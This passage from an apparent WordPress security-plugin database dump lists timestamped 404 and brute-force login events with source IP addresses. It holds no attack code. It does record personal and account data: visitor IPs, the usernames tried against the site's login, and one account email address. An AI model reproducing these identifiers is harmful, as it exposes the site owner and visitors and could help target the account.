00:35:37','114.119.141.146',NULL,NULL),(79552,'four_oh_four','2021-05-14 19:41:37','2021-05-15 00:41:37','163.172.51.75',NULL,NULL),(79553,'four_oh_four','2021-05-14 19:41:49','2021-05-15 00:41:49','163.172.51.75',NULL,NULL),(79554,'four_oh_four','2021-05-14 20:28:50','2021-05-15 01:28:50','72.83.225.114',NULL,NULL),(79555,'four_oh_four','2021-05-14 20:42:41','2021-05-15 01:42:41','40.77.167.67',NULL,NULL),(79556,'four_oh_four','2021-05-14 21:14:48','2021-05-15 02:14:48','47.75.44.156',NULL,NULL),(79557,'four_oh_four','2021-05-14 21:15:01','2021-05-15 02:15:01','47.75.44.156',NULL,NULL),(79558,'four_oh_four','2021-05-14 21:21:47','2021-05-15 02:21:47','107.175.151.84',NULL,NULL),(79559,'four_oh_four','2021-05-14 22:31:15','2021-05-15 03:31:15','185.224.137.123',NULL,NULL),(79560,'four_oh_four','2021-05-14 22:41:02','2021-05-15 03:41:02','66.249.69.217',NULL,NULL),(79561,'four_oh_four','2021-05-14 23:20:39','2021-05-15 04:20:39','194.59.246.76',NULL,NULL),(79562,'four_oh_four','2021-05-14 23:25:56','2021-05-15 04:25:56','78.46.73.116',NULL,NULL),(79563,'four_oh_four','2021-05-14 23:51:47','2021-05-15 04:51:47','69.65.40.75',NULL,NULL),(79564,'four_oh_four','2021-05-14 23:51:50','2021-05-15 04:51:50','69.65.40.75',NULL,NULL),(79565,'four_oh_four','2021-05-14 23:57:48','2021-05-15 04:57:48','207.46.13.78',NULL,NULL),(79566,'four_oh_four','2021-05-15 00:23:07','2021-05-15 05:23:07','114.119.157.110',NULL,NULL),(79567,'four_oh_four','2021-05-15 01:32:06','2021-05-15 06:32:06','123.56.228.164',NULL,NULL),(79568,'four_oh_four','2021-05-15 01:57:08','2021-05-15 06:57:08','13.66.139.0',NULL,NULL),(79569,'four_oh_four','2021-05-15 02:19:01','2021-05-15 07:19:01','119.8.175.117',NULL,NULL),(79570,'four_oh_four','2021-05-15 02:21:04','2021-05-15 07:21:04','47.90.42.101',NULL,NULL),(79571,'four_oh_four','2021-05-15 02:38:19','2021-05-15 07:38:19','47.89.231.174',NULL,NULL),(79572,'four_oh_four','2021-05-15 02:38:24','2021-05-15 07:38:24','47.89.231.174',NULL,NULL),(79573,'four_oh_four','2021-05-15 02:48:30','2021-05-15 07:48:30','47.89.231.174',NULL,NULL),(79574,'four_oh_four','2021-05-15 03:16:15','2021-05-15 08:16:15','193.106.30.100',NULL,NULL),(79575,'four_oh_four','2021-05-15 04:19:00','2021-05-15 09:19:00','114.119.143.145',NULL,NULL),(79576,'four_oh_four','2021-05-15 05:19:52','2021-05-15 10:19:52','185.244.214.41',NULL,NULL),(79577,'four_oh_four','2021-05-15 05:47:45','2021-05-15 10:47:45','66.249.69.215',NULL,NULL),(79578,'four_oh_four','2021-05-15 07:27:55','2021-05-15 12:27:55','66.249.69.219',NULL,NULL),(79579,'four_oh_four','2021-05-15 09:03:19','2021-05-15 14:03:19','66.249.69.219',NULL,NULL),(79580,'four_oh_four','2021-05-15 09:40:46','2021-05-15 14:40:46','92.38.136.69',NULL,NULL),(79581,'four_oh_four','2021-05-15 10:37:52','2021-05-15 15:37:52','114.119.151.107',NULL,NULL),(79582,'four_oh_four','2021-05-15 11:35:33','2021-05-15 16:35:33','204.101.61.82',NULL,NULL),(79583,'four_oh_four','2021-05-15 12:48:03','2021-05-15 17:48:03','47.52.135.58',NULL,NULL),(79584,'four_oh_four','2021-05-15 14:16:33','2021-05-15 19:16:33','185.241.174.33',NULL,NULL),(79585,'four_oh_four','2021-05-15 14:17:07','2021-05-15 19:17:07','218.28.12.112',NULL,NULL),(79586,'four_oh_four','2021-05-15 16:05:48','2021-05-15 21:05:48','184.154.139.21',NULL,NULL),(79587,'four_oh_four','2021-05-15 16:51:53','2021-05-15 21:51:53','204.101.61.82',NULL,NULL),(79588,'four_oh_four','2021-05-15 18:05:00','2021-05-15 23:05:00','178.125.68.19',NULL,NULL),(79589,'four_oh_four','2021-05-15 18:07:05','2021-05-15 23:07:05','194.59.246.76',NULL,NULL),(79590,'four_oh_four','2021-05-15 20:53:15','2021-05-16 01:53:15','114.119.158.13',NULL,NULL),(79591,'four_oh_four','2021-05-15 22:53:23','2021-05-16 03:53:23','114.119.136.66',NULL,NULL),(79592,'four_oh_four','2021-05-15 22:53:47','2021-05-16 03:53:47','23.228.109.147',NULL,NULL),(79593,'four_oh_four','2021-05-16 01:47:13','2021-05-16 06:47:13','185.182.56.216',NULL,NULL),(79594,'four_oh_four','2021-05-16 02:37:29','2021-05-16 07:37:29','114.119.157.110',NULL,NULL),(79595,'four_oh_four','2021-05-16 03:54:40','2021-05-16 08:54:40','178.187.207.239',NULL,NULL),(79596,'four_oh_four','2021-05-16 04:25:14','2021-05-16 09:25:14','114.119.136.66',NULL,NULL),(79597,'four_oh_four','2021-05-16 04:37:14','2021-05-16 09:37:14','114.119.141.146',NULL,NULL),(79598,'four_oh_four','2021-05-16 04:53:04','2021-05-16 09:53:04','207.46.13.78',NULL,NULL),(79599,'four_oh_four','2021-05-16 05:31:56','2021-05-16 10:31:56','178.184.122.203',NULL,NULL),(79600,'four_oh_four','2021-05-16 07:40:57','2021-05-16 12:40:57','85.208.187.223',NULL,NULL),(79601,'four_oh_four','2021-05-16 08:01:58','2021-05-16 13:01:58','114.119.143.145',NULL,NULL),(79602,'four_oh_four','2021-05-16 08:53:28','2021-05-16 13:53:28','193.106.30.100',NULL,NULL),(79603,'four_oh_four','2021-05-16 10:38:47','2021-05-16 15:38:47','114.119.151.107',NULL,NULL),(79604,'four_oh_four','2021-05-16 11:22:11','2021-05-16 16:22:11','23.228.109.147',NULL,NULL),(79605,'four_oh_four','2021-05-16 11:52:04','2021-05-16 16:52:04','157.55.39.3',NULL,NULL),(79606,'four_oh_four','2021-05-16 13:01:54','2021-05-16 18:01:54','184.178.172.13',NULL,NULL),(79607,'four_oh_four','2021-05-16 13:43:31','2021-05-16 18:43:31','195.2.92.46',NULL,NULL),(79608,'four_oh_four','2021-05-16 13:56:50','2021-05-16 18:56:50','114.119.130.104',NULL,NULL),(79609,'four_oh_four','2021-05-16 14:22:02','2021-05-16 19:22:02','184.154.139.18',NULL,NULL),(79610,'four_oh_four','2021-05-16 15:12:09','2021-05-16 20:12:09','114.119.143.145',NULL,NULL),(79611,'four_oh_four','2021-05-16 15:50:43','2021-05-16 20:50:43','114.119.143.145',NULL,NULL),(79612,'four_oh_four','2021-05-16 16:12:52','2021-05-16 21:12:52','114.119.148.105',NULL,NULL),(79613,'four_oh_four','2021-05-16 16:59:54','2021-05-16 21:59:54','88.147.152.161',NULL,NULL),(79614,'four_oh_four','2021-05-16 17:03:30','2021-05-16 22:03:30','114.119.157.110',NULL,NULL),(79615,'four_oh_four','2021-05-16 17:35:38','2021-05-16 22:35:38','185.209.22.137',NULL,NULL),(79616,'four_oh_four','2021-05-16 19:13:16','2021-05-17 00:13:16','204.101.61.82',NULL,NULL),(79617,'four_oh_four','2021-05-16 20:03:29','2021-05-17 01:03:29','45.87.83.124',NULL,NULL),(79618,'four_oh_four','2021-05-16 22:11:13','2021-05-17 03:11:13','85.143.219.155',NULL,NULL),(79619,'four_oh_four','2021-05-16 22:11:17','2021-05-17 03:11:17','85.143.219.155',NULL,NULL),(79620,'four_oh_four','2021-05-16 22:48:28','2021-05-17 03:48:28','84.17.47.103',NULL,NULL),(79621,'four_oh_four','2021-05-17 00:53:31','2021-05-17 05:53:31','50.31.138.167',NULL,NULL),(79622,'four_oh_four','2021-05-17 02:00:08','2021-05-17 07:00:08','114.119.157.110',NULL,NULL),(79623,'four_oh_four','2021-05-17 02:25:06','2021-05-17 07:25:06','77.111.247.119',NULL,NULL),(79624,'four_oh_four','2021-05-17 02:36:03','2021-05-17 07:36:03','80.253.235.74',NULL,NULL),(79625,'four_oh_four','2021-05-17 04:05:03','2021-05-17 09:05:03','114.119.145.125',NULL,NULL),(79626,'four_oh_four','2021-05-17 04:11:34','2021-05-17 09:11:34','114.119.145.125',NULL,NULL),(79627,'four_oh_four','2021-05-17 04:48:24','2021-05-17 09:48:24','207.46.13.61',NULL,NULL),(79628,'four_oh_four','2021-05-17 06:14:14','2021-05-17 11:14:14','45.128.133.228',NULL,NULL),(79629,'four_oh_four','2021-05-17 06:40:13','2021-05-17 11:40:13','159.203.127.124',NULL,NULL),(79630,'four_oh_four','2021-05-17 06:40:19','2021-05-17 11:40:19','159.203.127.124',NULL,NULL),(79631,'four_oh_four','2021-05-17 06:40:23','2021-05-17 11:40:23','159.203.127.124',NULL,NULL),(79632,'four_oh_four','2021-05-17 06:40:28','2021-05-17 11:40:28','159.203.127.124',NULL,NULL),(79633,'four_oh_four','2021-05-17 06:40:33','2021-05-17 11:40:33','159.203.127.124',NULL,NULL),(79634,'four_oh_four','2021-05-17 06:40:38','2021-05-17 11:40:38','159.203.127.124',NULL,NULL),(79635,'four_oh_four','2021-05-17 06:40:43','2021-05-17 11:40:43','159.203.127.124',NULL,NULL),(79636,'four_oh_four','2021-05-17 06:40:48','2021-05-17 11:40:48','159.203.127.124',NULL,NULL),(79637,'four_oh_four','2021-05-17 06:40:53','2021-05-17 11:40:53','159.203.127.124',NULL,NULL),(79638,'four_oh_four','2021-05-17 06:40:58','2021-05-17 11:40:58','159.203.127.124',NULL,NULL),(79639,'four_oh_four','2021-05-17 06:41:04','2021-05-17 11:41:04','159.203.127.124',NULL,NULL),(79640,'four_oh_four','2021-05-17 06:41:10','2021-05-17 11:41:10','159.203.127.124',NULL,NULL),(79641,'four_oh_four','2021-05-17 06:41:15','2021-05-17 11:41:15','159.203.127.124',NULL,NULL),(79642,'four_oh_four','2021-05-17 06:41:20','2021-05-17 11:41:20','159.203.127.124',NULL,NULL),(79643,'four_oh_four','2021-05-17 06:41:26','2021-05-17 11:41:26','159.203.127.124',NULL,NULL),(79644,'four_oh_four','2021-05-17 06:41:41','2021-05-17 11:41:41','159.203.127.124',NULL,NULL),(79645,'four_oh_four','2021-05-17 06:41:45','2021-05-17 11:41:45','159.203.127.124',NULL,NULL),(79646,'four_oh_four','2021-05-17 06:41:51','2021-05-17 11:41:51','159.203.127.124',NULL,NULL),(79647,'four_oh_four','2021-05-17 06:41:56','2021-05-17 11:41:56','159.203.127.124',NULL,NULL),(79648,'four_oh_four','2021-05-17 09:24:48','2021-05-17 14:24:48','66.249.69.219',NULL,NULL),(79649,'four_oh_four','2021-05-17 09:26:47','2021-05-17 14:26:47','207.46.13.78',NULL,NULL),(79650,'four_oh_four','2021-05-17 09:37:33','2021-05-17 14:37:33','114.119.151.107',NULL,NULL),(79651,'four_oh_four','2021-05-17 10:30:03','2021-05-17 15:30:03','67.205.37.138',NULL,NULL),(79652,'four_oh_four','2021-05-17 12:02:06','2021-05-17 17:02:06','5.188.48.98',NULL,NULL),(79653,'four_oh_four','2021-05-17 12:02:05','2021-05-17 17:02:05','5.188.48.98',NULL,NULL),(79654,'four_oh_four','2021-05-17 12:46:57','2021-05-17 17:46:57','195.2.70.173',NULL,NULL),(79655,'four_oh_four','2021-05-17 14:12:18','2021-05-17 19:12:18','184.154.139.17',NULL,NULL),(79656,'four_oh_four','2021-05-17 15:15:25','2021-05-17 20:15:25','114.119.141.146',NULL,NULL),(79657,'four_oh_four','2021-05-17 16:05:38','2021-05-17 21:05:38','5.188.48.88',NULL,NULL),(79658,'four_oh_four','2021-05-17 17:06:38','2021-05-17 22:06:38','194.59.246.76',NULL,NULL),(79659,'four_oh_four','2021-05-17 17:29:02','2021-05-17 22:29:02','78.46.73.116',NULL,NULL),(79660,'four_oh_four','2021-05-17 18:00:00','2021-05-17 23:00:00','5.188.48.22',NULL,NULL),(79661,'four_oh_four','2021-05-17 18:00:00','2021-05-17 23:00:00','5.188.48.22',NULL,NULL),(79662,'four_oh_four','2021-05-17 18:48:46','2021-05-17 23:48:46','66.249.65.77',NULL,NULL),(79663,'four_oh_four','2021-05-17 19:40:45','2021-05-18 00:40:45','157.55.39.1',NULL,NULL),(79664,'four_oh_four','2021-05-17 20:36:02','2021-05-18 01:36:02','114.119.134.41',NULL,NULL),(79665,'four_oh_four','2021-05-17 21:00:30','2021-05-18 02:00:30','18.208.189.241',NULL,NULL),(79666,'four_oh_four','2021-05-17 22:20:44','2021-05-18 03:20:44','148.251.54.157',NULL,NULL),(79667,'four_oh_four','2021-05-18 00:06:42','2021-05-18 05:06:42','207.46.13.47',NULL,NULL),(79668,'four_oh_four','2021-05-18 01:07:59','2021-05-18 06:07:59','144.76.102.243',NULL,NULL),(79669,'four_oh_four','2021-05-18 01:11:33','2021-05-18 06:11:33','188.163.73.127',NULL,NULL),(79670,'four_oh_four','2021-05-18 01:29:36','2021-05-18 06:29:36','114.119.130.104',NULL,NULL),(79671,'four_oh_four','2021-05-18 01:52:32','2021-05-18 06:52:32','114.119.145.125',NULL,NULL),(79672,'four_oh_four','2021-05-18 04:24:36','2021-05-18 09:24:36','188.35.131.246',NULL,NULL),(79673,'four_oh_four','2021-05-18 04:43:57','2021-05-18 09:43:57','85.208.187.223',NULL,NULL),(79674,'four_oh_four','2021-05-18 05:39:17','2021-05-18 10:39:17','195.2.70.173',NULL,NULL),(79675,'four_oh_four','2021-05-18 05:39:32','2021-05-18 10:39:32','5.188.48.22',NULL,NULL),(79676,'four_oh_four','2021-05-18 05:39:32','2021-05-18 10:39:32','5.188.48.22',NULL,NULL),(79677,'four_oh_four','2021-05-18 06:50:50','2021-05-18 11:50:50','159.203.127.124',NULL,NULL),(79678,'four_oh_four','2021-05-18 06:50:54','2021-05-18 11:50:54','159.203.127.124',NULL,NULL),(79679,'four_oh_four','2021-05-18 06:51:00','2021-05-18 11:51:00','159.203.127.124',NULL,NULL),(79680,'four_oh_four','2021-05-18 06:51:05','2021-05-18 11:51:05','159.203.127.124',NULL,NULL),(79681,'four_oh_four','2021-05-18 06:51:10','2021-05-18 11:51:10','159.203.127.124',NULL,NULL),(79682,'four_oh_four','2021-05-18 06:51:16','2021-05-18 11:51:16','159.203.127.124',NULL,NULL),(79683,'four_oh_four','2021-05-18 06:51:21','2021-05-18 11:51:21','159.203.127.124',NULL,NULL),(79684,'four_oh_four','2021-05-18 06:51:26','2021-05-18 11:51:26','159.203.127.124',NULL,NULL),(79685,'four_oh_four','2021-05-18 06:51:30','2021-05-18 11:51:30','159.203.127.124',NULL,NULL),(79686,'four_oh_four','2021-05-18 06:51:34','2021-05-18 11:51:34','159.203.127.124',NULL,NULL),(79687,'four_oh_four','2021-05-18 06:51:39','2021-05-18 11:51:39','159.203.127.124',NULL,NULL),(79688,'four_oh_four','2021-05-18 06:51:44','2021-05-18 11:51:44','159.203.127.124',NULL,NULL),(79689,'four_oh_four','2021-05-18 06:51:49','2021-05-18 11:51:49','159.203.127.124',NULL,NULL),(79690,'four_oh_four','2021-05-18 06:51:54','2021-05-18 11:51:54','159.203.127.124',NULL,NULL),(79691,'four_oh_four','2021-05-18 06:51:59','2021-05-18 11:51:59','159.203.127.124',NULL,NULL),(79692,'four_oh_four','2021-05-18 06:52:13','2021-05-18 11:52:13','159.203.127.124',NULL,NULL),(79693,'four_oh_four','2021-05-18 06:52:19','2021-05-18 11:52:19','159.203.127.124',NULL,NULL),(79694,'four_oh_four','2021-05-18 06:52:25','2021-05-18 11:52:25','159.203.127.124',NULL,NULL),(79695,'four_oh_four','2021-05-18 06:52:30','2021-05-18 11:52:30','159.203.127.124',NULL,NULL),(79696,'four_oh_four','2021-05-18 12:59:15','2021-05-18 17:59:15','50.63.197.78',NULL,NULL),(79697,'four_oh_four','2021-05-18 14:23:46','2021-05-18 19:23:46','184.154.139.18',NULL,NULL),(79698,'four_oh_four','2021-05-18 15:13:28','2021-05-18 20:13:28','185.209.20.183',NULL,NULL),(79699,'four_oh_four','2021-05-18 15:44:51','2021-05-18 20:44:51','188.122.82.146',NULL,NULL),(79700,'four_oh_four','2021-05-18 15:44:51','2021-05-18 20:44:51','188.122.82.146',NULL,NULL),(79701,'four_oh_four','2021-05-18 17:01:16','2021-05-18 22:01:16','194.59.246.76',NULL,NULL),(79702,'four_oh_four','2021-05-18 17:21:09','2021-05-18 22:21:09','91.211.251.112',NULL,NULL),(79703,'four_oh_four','2021-05-18 17:50:04','2021-05-18 22:50:04','85.209.89.243',NULL,NULL),(79704,'four_oh_four','2021-05-18 18:58:41','2021-05-18 23:58:41','193.106.30.100',NULL,NULL),(79705,'four_oh_four','2021-05-18 21:28:38','2021-05-19 02:28:38','23.228.109.147',NULL,NULL),(79706,'four_oh_four','2021-05-18 21:46:10','2021-05-19 02:46:10','185.209.22.137',NULL,NULL),(79707,'four_oh_four','2021-05-18 22:04:25','2021-05-19 03:04:25','3.94.137.21',NULL,NULL),(79708,'four_oh_four','2021-05-18 22:04:28','2021-05-19 03:04:28','3.94.137.21',NULL,NULL),(79709,'four_oh_four','2021-05-18 22:04:32','2021-05-19 03:04:32','3.94.137.21',NULL,NULL),(79710,'four_oh_four','2021-05-18 22:04:37','2021-05-19 03:04:37','3.94.137.21',NULL,NULL),(79711,'four_oh_four','2021-05-18 23:40:41','2021-05-19 04:40:41','114.119.148.105',NULL,NULL),(79712,'four_oh_four','2021-05-18 23:49:52','2021-05-19 04:49:52','36.73.177.65',NULL,NULL),(79713,'four_oh_four','2021-05-19 01:30:32','2021-05-19 06:30:32','85.208.187.223',NULL,NULL),(79714,'four_oh_four','2021-05-19 03:41:51','2021-05-19 08:41:51','89.32.251.5',NULL,NULL),(79715,'four_oh_four','2021-05-19 04:20:57','2021-05-19 09:20:57','207.46.13.74',NULL,NULL),(79716,'four_oh_four','2021-05-19 08:57:41','2021-05-19 13:57:41','40.77.167.5',NULL,NULL),(79717,'four_oh_four','2021-05-19 09:50:38','2021-05-19 14:50:38','185.197.74.175',NULL,NULL),(79718,'brute_force','2021-05-19 11:20:21','2021-05-19 16:20:21','193.105.252.82',NULL,NULL),(79719,'brute_force','2021-05-19 11:20:21','2021-05-19 16:20:21',NULL,1,'pr@zphiblgz.org'),(79720,'brute_force','2021-05-19 11:20:21','2021-05-19 16:20:21','193.105.252.82',NULL,NULL),(79721,'brute_force','2021-05-19 11:20:21','2021-05-19 16:20:21',NULL,NULL,'admin'),(79722,'four_oh_four','2021-05-19 14:06:45','2021-05-19 19:06:45','184.154.139.20',NULL,NULL),(79723,'four_oh_four','2021-05-19 14:46:50','2021-05-19 19:46:50','34.204.91.176',NULL,NULL),(79724,'four_oh_four','2021-05-19 15:17:57','2021-05-19 20:17:57','194.59.246.76',NULL,NULL),(79725,'four_oh_four','2021-05-19 16:16:10','2021-05-19 21:16:10','188.35.131.246',NULL,NULL),(79726,'four_oh_four','2021-05-19 20:00:56','2021-05-20 01:00:56','204.101.61.82',NULL,NULL),(79727,'four_oh_four','2021-05-19 21:25:55','2021-05-20 02:25:55','72.79.50.66',NULL,NULL),(79728,'brute_force','2021-05-20 00:15:05','2021-05-20 05:15:05','180.194.49.45',NULL,NULL),(79729,'brute_force','2021-05-20 00:15:05','2021-05-20 05:15:05',NULL,NULL,'zphiblgz'),(79730,'brute_force','2021-05-20 00:16:14','2021-05-20 05:16:14','180.194.49.45',NULL,NULL),(79731,'brute_force','2021-05-20 00:16:14','2021-05-20 05:16:14',NULL,NULL,'zphiblgz'),(79732,'brute_force','2021-05-20 00:17:26','2021-05-20 05:17:26','180.194.49.45',NULL,NULL),(79733,'brute_force','2021-05-20 00:17:26','2021-05-20 05:17:26',NULL,NULL,'zphiblgz'),(79734,'brute_force','2021-05-20 00:18:28','2021-05-20 05:18:28','180.194.49.45',NULL,NULL),(79735,'brute_force','2021-05-20 00:18:28','2021-05-20 05:18:28',NULL,NULL,'zphiblgz'),(79736,'brute_force','2021-05-20 00:19:42','2021-05-20 05:19:42','180.194.49.45',NULL,NULL),(79737,'brute_force','2021-05-20 00:19:42','2021-05-20 05:19:42',NULL,NULL,'zphiblgz'),(79738,'brute_force','2021-05-20 00:35:36','2021-05-20 05:35:36','180.194.49.45',NULL,NULL),(79739,'brute_force','2021-05-20 00:35:36','2021-05-20 05:35:36',NULL,NULL,'zphiblgz'),(79740,'brute_force','2021-05-20 00:51:34','2021-05-20 05:51:34','180.194.49.45',NULL,NULL),(79741,'brute_force','2021-05-20 00:51:34','2021-05-20 05:51:34',NULL,NULL,'zphiblgz'),(79742,'brute_force','2021-05-20 00:52:36','2021-05-20 05:52:36','180.194.49.45',NULL,NULL),(79743,'brute_force','2021-05-20 00:52:36','2021-05-20 05:52:36',NULL,NULL,'zphiblgz'),(79744,'brute_force','2021-05-20 00:53:46','2021-05-20 05:53:46','180.194.49.45',NULL,NULL),(79745,'brute_force','2021-05-20 00:53:46','2021-05-20 05:53:46',NULL,NULL,'zphiblgz'),(79746,'brute_force','2021-05-20 00:57:24','2021-05-20 05:57:24','180.194.49.45',NULL,NULL),(79747,'brute_force','2021-05-20 00:57:24','2021-05-20 05:57:24',NULL,NULL,'zphiblgz'),(79748,'brute_force','2021-05-20 00:59:01','2021-05-20 05:59:01','180.194.49.45',NULL,NULL),(79749,'brute_force','2021-05-20 00:59:01','2021-05-20 05:59:01',NULL,NULL,'zphiblgz'),(79750,'four_oh_four','2021-05-20 01:00:10','2021-05-20 06:00:10','85.143.219.155',NULL,NULL),(79751,'brute_force','2021-05-20 01:00:14','2021-05-20 06:00:14','180.194.49.45',NULL,NULL),(79752,'brute_force','2021-05-20 01:00:14','2021-05-20 06:00:14',NULL,NULL,'zphiblgz'),(79753,'brute_force','2021-05-20 01:01:16','2021-05-20 06:01:16','180.194.49.45',NULL,NULL),(79754,'brute_force','2021-05-20 01:01:16','2021-05-20 06:01:16',NULL,NULL,'zphiblgz'),(79755,'brute_force','2021-05-20 01:02:22','2021-05-20 06:02:22','180.194.49.45',NULL,NULL),(79756,'brute_force','2021-05-20 01:02:22','2021-05-20 06:02:22',NULL,NULL,'zphiblgz'),(79757,'brute_force','2021-05-20 01:19:21','2021-05-20 06:19:21','180.194.49.45',NULL,NULL),(79758,'brute_force','2021-05-20 01:19:21','2021-05-20 06:19:21',NULL,NULL,'zphiblgz'),(79759,'brute_force','2021-05-20 01:34:24','2021-05-20 06:34:24','180.194.49.45',NULL,NULL),(79760,'brute_force','2021-05-20 01:34:24','2021-05-20 06:34:24',NULL,NULL,'zphiblgz'),(79761,'brute_force','2021-05-20 01:35:30','2021-05-20 06:35:30','180.194.49.45',NULL,NULL),(79762,'brute_force','2021-05-20 01:35:30','2021-05-20 06:35:30',NULL,NULL,'zphiblgz'),(79763,'brute_force','2021-05-20 01:36:32','2021-05-20 06:36:32','180.194.49.45',NULL,NULL),(79764,'brute_force','2021-05-20 01:36:32','2021-05-20 06:36:32',NULL,NULL,'zphiblgz'),(79765,'brute_force','2021-05-20 01:37:36','2021-05-20 06:37:36','180.194.49.45',NULL,NULL),(79766,'brute_force','2021-05-20 01:37:36','2021-05-20 06:37:36',NULL,NULL,'zphiblgz'),(79767,'brute_force','2021-05-20 01:39:26','2021-05-20 06:39:26','180.194.49.45',NULL,NULL),(79768,'brute_force','2021-05-20 01:39:26','2021-05-20 06:39:26',NULL,NULL,'zphiblgz'),(79769,'brute_force','2021-05-20 01:40:51','2021-05-20 06:40:51','180.194.49.45',NULL,NULL),(79770,'brute_force','2021-05-20 01:40:51','2021-05-20 06:40:51',NULL,NULL,'zphiblgz'),(79771,'brute_force','2021-05-20 01:42:48','2021-05-20 06:42:48','180.194.49.45',NULL,NULL),(79772,'brute_force','2021-05-20 01:42:48','2021-05-20 06:42:48',NULL,NULL,'zphiblgz'),(79773,'brute_force','2021-05-20 01:46:22','2021-05-20 06:46:22','180.194.49.45',NULL,NULL),(79774,'brute_force','2021-05-20 01:46:22','2021-05-20 06:46:22',NULL,NULL,'zphiblgz'),(79775,'brute_force','2021-05-20 01:47:23','2021-05-20 06:47:23','180.194.49.45',NULL,NULL),(79776,'brute_force','2021-05-20 01:47:23','2021-05-20 06:47:23',NULL,NULL,'zphiblgz'),(79777,'brute_force','2021-05-20 01:50:06','2021-05-20 06:50:06','180.194.49.45',NULL,NULL),(79778,'brute_force','2021-05-20 01:50:06','2021-05-20 06:50:06',NULL,NULL,'zphiblgz'),(79779,'brute_force','2021-05-20 01:55:19','2021-05-20 06:55:19','180.194.49.45',NULL,NULL),(79780,'brute_force','2021-05-20 01:55:19','2021-05-20 06:55:19',NULL,NULL,'zphiblgz'),(79781,'brute_force','2021-05-20 01:57:37','2021-05-20 06:57:37','180.194.49.45',NULL,NULL),(79782,'brute_force','2021-05-20 01:57:37','2021-05-20 06:57:37',NULL,NULL,'zphiblgz'),(79783,'brute_force','2021-05-20 01:59:03','2021-05-20 06:59:03','180.194.49.45',NULL,NULL),(79784,'brute_force','2021-05-20 01:59:03','2021-05-20 06:59:03',NULL,NULL,'zphiblgz'),(79785,'brute_force','2021-05-20 02:00:05','2021-05-20 07:00:05','180.194.49.45',NULL,NULL),(79786,'brute_force','2021-05-20 02:00:05','2021-05-20 07:00:05',NULL,NULL,'zphiblgz'),(79787,'brute_force','2021-05-20 02:01:41','2021-05-20 07:01:41','180.194.49.45',NULL,NULL),(79788,'brute_force','2021-05-20 02:01:41','2021-05-20 07:01:41',NULL,NULL,'zphiblgz'),(79789,'brute_force','2021-05-20 02:02:53','2021-05-20 07:02:53','180.194.49.45',NULL,NULL),(79790,'brute_force','2021-05-20 02:02:53','2021-05-20 07:02:53',NULL,NULL,'zphiblgz'),(79791,'four_oh_four','2021-05-20 02:03:55','2021-05-20 07:03:55','202.39.38.247',NULL,NULL),(79792,'brute_force','2021-05-20 02:20:15','2021-05-20 07:20:15','180.194.49.45',NULL,NULL),(79793,'brute_force','2021-05-20 02:20:15','2021-05-20 07:20:15',NULL,NULL,'zphiblgz'),(79794,'brute_force','2021-05-20 02:20:18','2021-05-20 07:20:18','180.194.49.45',NULL,NULL),(79795,'brute_force','2021-05-20 02:20:18','2021-05-20 07:20:18',NULL,NULL,'zphiblgz'),(79796,'brute_force','2021-05-20 02:22:02','2021-05-20 07:22:02','180.194.49.45',NULL,NULL),(79797,'brute_force','2021-05-20 02:22:02','2021-05-20 07:22:02',NULL,NULL,'zphiblgz'),(79798,'brute_force','2021-05-20 02:22:05','2021-05-20 07:22:05','180.194.49.45',NULL,NULL),(79799,'brute_force','2021-05-20 02:22:05','2021-05-20 07:22:05',NULL,NULL,'zphiblgz'),(79800,'brute_force','2021-05-20 02:23:38','2021-05-20 07:23:38','180.194.49.45',NULL,NULL),(79801,'brute_force','2021-05-20 02:23:38','2021-05-20 07:23:38',NULL,NULL,'zphiblgz'),(79802,'four_oh_four','2021-05-20 03:10:04','2021-05-20 08:10:04','114.119.148.105',NULL,NULL),(79803,'four_oh_four','2021-05-20 03:35:18','2021-05-20 08:35:18','156.67.222.53',NULL,NULL),(79804,'four_oh_four','2021-05-20 04:21:00','2021-05-20 09:21:00','45.87.83.124',NULL,NULL),(79805,'four_oh_four','2021-05-20 04:22:58','2021-05-20 09:22:58','103.56.156.200',NULL,NULL),(79806,'four_oh_four','2021-05-20 05:06:37','2021-05-20 10:06:37','157.55.39.3',NULL,NULL),(79807,'four_oh_four','2021-05-20 06:31:45','2021-05-20 11:31:45','5.188.48.98',NULL,NULL),(79808,'four_oh_four','2021-05-20 06:58:07','2021-05-20 11:58:07','114.119.136.66',NULL,NULL),(79809,'four_oh_four','2021-05-20 08:30:02','2021-05-20 13:30:02','114.119.141.146',NULL,NULL),(79810,'four_oh_four','2021-05-20 08:38:50','2021-05-20 13:38:50','67.222.39.74',NULL,NULL),(79811,'four_oh_four','2021-05-20 08:54:08','2021-05-20 13:54:08','207.46.13.74',NULL,NULL),(79812,'four_oh_four','2021-05-20 12:02:21','2021-05-20 17:02:21','40.77.167.5',NULL,NULL),(79813,'four_oh_four','2021-05-20 12:18:18','2021-05-20 17:18:18','114.119.145.125',NULL,NULL),(79814,'four_oh_four','2021-05-20 12:54:19','2021-05-20 17:54:19','114.119.130.104',NULL,NULL),(79815,'four_oh_four','2021-05-20 13:28:19','2021-05-20 18:28:19','40.77.167.5',NULL,NULL),(79816,'four_oh_four','2021-05-20 13:43:39','2021-05-20 18:43:39','114.119.157.110',NULL,NULL),(79817,'four_oh_four','2021-05-20 13:58:24','2021-05-20 18:58:24','195.154.60.148',NULL,NULL),(79818,'four_oh_four','2021-05-20 14:11:22','2021-05-20 19:11:22','184.154.139.21',NULL,NULL),(79819,'four_oh_four','2021-05-20 17:13:35','2021-05-20 22:13:35','193.106.30.100',NULL,NULL),(79820,'four_oh_four','2021-05-20 19:35:02','2021-05-21 00:35:02','207.46.13.74',NULL,NULL),(79821,'four_oh_four','2021-05-20 20:30:59','2021-05-21 01:30:59','114.119.136.66',NULL,NULL),(79822,'four_oh_four','2021-05-20 21:44:02','2021-05-21 02:44:02','87.236.20.174',NULL,NULL),(79823,'four_oh_four','2021-05-20 22:01:22','2021-05-21 03:01:22','198.251.89.164',NULL,NULL),(79824,'four_oh_four','2021-05-20 22:18:24','2021-05-21 03:18:24','95.37.28.78',NULL,NULL),(79825,'four_oh_four','2021-05-20 23:05:34','2021-05-21 04:05:34','193.106.30.100',NULL,NULL),(79826,'four_oh_four','2021-05-21 02:56:56','2021-05-21 07:56:56','114.119.158.13',NULL,NULL),(79827,'four_oh_four','2021-05-21 03:00:58','2021-05-21 08:00:58','114.119.158.13',NULL,NULL),(79828,'four_oh_four','2021-05-21 03:15:51','2021-05-21 08:15:51','114.119.141.146',NULL,NULL),(79829,'four_oh_four','2021-05-21 03:41:08','2021-05-21 08:41:08','134.249.215.60',NULL,NULL),(79830,'four_oh_four','2021-05-21 04:54:40','2021-05-21 09:54:40','40.77.167.5',NULL,NULL),(79831,'four_oh_four','2021-05-21 